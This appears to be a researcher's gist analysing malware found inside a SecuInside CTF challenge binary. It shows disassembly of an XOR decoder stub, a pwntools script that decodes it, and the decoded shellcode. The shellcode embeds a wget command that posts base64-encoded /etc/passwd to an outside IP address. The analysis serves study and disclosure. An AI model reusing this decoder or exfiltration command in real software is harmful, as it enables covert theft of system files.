@zachriggle
Last active September 22, 2015 19:15
secuinside challenge malware

Just a small present which was in one of the SecuInside Finals challenge binaries. The source appears to be that a South Korean government mail server was hacked, and challenge binaries being sent by the organizers went over it, and were thus infected themselves.

It doesn't look like it was active or invoked from anywhere, but then I didn't look too hard either. All it does is grab /etc/passwd and shuttle it off to some AWS node.

There's a really cool story behind this incident, involving the South Korean government arresting CTF players, which you can hear about here: https://www.youtube.com/watch?v=Jnh8PK9iQco

from pwn import *  # https://pwntools.com to install
e = ELF('notes_19cd983d58eef2e5c7881ae8407e76d6')

### Decoder loop, which is never referenced.
### After the fork, the parent jumps to 41414141h (apparently an unfilled
### placeholder) and the child falls through into the decoder. 'pop esi /
### push esi' leaves the return address (0804C0CB, the first encoded dword)
### both in ESI and on the stack, so the blob is decoded in place and the
### final 'retn' lands on the freshly decoded code.
"""
.data:0804C0A0 ; ---------------------------------------------------------------------------
.data:0804C0A0 mov eax, 2
.data:0804C0A5 int 80h ; LINUX - sys_fork
.data:0804C0A7 test eax, eax
.data:0804C0A9 jz short loc_804C0B2
.data:0804C0AB mov eax, 41414141h
.data:0804C0B0 jmp eax
.data:0804C0B2 ; ---------------------------------------------------------------------------
.data:0804C0B2
.data:0804C0B2 loc_804C0B2: ; CODE XREF: .data:0804C0A9j
.data:0804C0B2 cld
.data:0804C0B3 mov ebx, 5363FD0h ; xor key
.data:0804C0B8 jmp short call_decode_loop
.data:0804C0BA
.data:0804C0BA ; =============== S U B R O U T I N E =======================================
.data:0804C0BA
.data:0804C0BA
.data:0804C0BA decode_loop proc near ; CODE XREF: .data:call_decode_loopp
.data:0804C0BA pop esi
.data:0804C0BB push esi
.data:0804C0BC
.data:0804C0BC loop: ; CODE XREF: decode_loop+9j
.data:0804C0BC xor [esi], ebx
.data:0804C0BE lodsd
.data:0804C0BF add ebx, eax
.data:0804C0C1 test eax, eax
.data:0804C0C3 jnz short loop
.data:0804C0C5 retn
.data:0804C0C5 decode_loop endp
.data:0804C0C5
.data:0804C0C6 ; ---------------------------------------------------------------------------
.data:0804C0C6
.data:0804C0C6 call_decode_loop: ; CODE XREF: .data:0804C0B8j
.data:0804C0C6 call decode_loop
.data:0804C0C6 ; ---------------------------------------------------------------------------
.data:0804C0CB dd 9C6E34BAh
"""

# Re-implement decode_loop: XOR each dword with the running key, then add the
# *decoded* dword to the key ('lodsd' runs after the xor, so EAX holds the
# plaintext). A decoded zero dword terminates the loop.
decoder = 0x0804C0A0
encoded = 0x0804C0CB   # return address popped into ESI, i.e. start of the blob
ebx = 0x05363FD0       # initial xor key
data = []
while True:
    dword = u32(e.read(encoded, 4))
    dword ^= ebx
    data.append(dword)
    eax = dword
    ebx = (ebx + eax) & 0xffffffff
    if dword == 0:
        break
    encoded += 4
payload = b''.join(map(p32, data))
print(hexdump(payload))
write('payload', payload)
### The dumped payload looks something like the following. It is a plain
### execve("/bin/sh", ["/bin/sh", "-c", "wget ..."], NULL) stub: EDX is zeroed
### by 'cdq' (envp and the argv terminator), "-c" and "/bin/sh" are built on
### the stack, and the 'call loc_C4' pushes the address of the wget string so
### it lands in argv between "-c" and the NULL.
"""
seg000:00000000 seg000 segment byte public 'CODE' use32
seg000:00000000 assume cs:seg000
seg000:00000000 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
seg000:00000000 push 0Bh ; sys_execve
seg000:00000002 pop eax
seg000:00000003 cdq
seg000:00000004 push edx
seg000:00000005 push small 632Dh
seg000:00000009 mov edi, esp
seg000:0000000B push 'hs/'
seg000:00000010 push 'nib/'
seg000:00000015 mov ebx, esp
seg000:00000017 push edx
seg000:00000018 call loc_C4
seg000:00000018 ; ---------------------------------------------------------------------------
seg000:0000001D aWgetHttp54_178 db 'wget http://54.178.137.178/9isnxkqmz.php --post-data "`cat /etc/p'
seg000:0000001D db 'asswd | base64 | tr -d "\n"`" --header="Content-Type: text/plain"'
seg000:0000001D db ' -O /dev/null >/dev/null 2>/dev/null',0
seg000:000000C4 ; ---------------------------------------------------------------------------
seg000:000000C4
seg000:000000C4 loc_C4: ; CODE XREF: seg000:00000018p
seg000:000000C4 push edi
seg000:000000C5 push ebx
seg000:000000C6 mov ecx, esp
seg000:000000C8 int 80h ; LINUX -
seg000:000000C8 ; ---------------------------------------------------------------------------
"""